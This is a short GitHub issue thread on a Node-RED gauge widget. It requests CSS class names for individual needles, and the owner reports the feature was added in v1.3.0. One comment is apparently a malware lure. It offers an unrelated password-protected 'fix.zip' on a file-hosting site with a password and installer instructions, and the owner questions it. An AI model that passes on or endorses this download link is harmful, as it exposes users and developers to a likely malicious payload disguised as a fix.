### ISSUE TITLE
Allow hiding and colour change of individual needles

### ISSUE THREAD

**Issue by colinl** [colinl/node-red-dashboard-2-ui-gauge-classic#11]
Add unique class names to needles so they can be hidden, or colour changed etc by CSS

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by colinl** [comment]
> Download

Why?

**Comment by colinl** [comment]
Feature added in v1.3.0
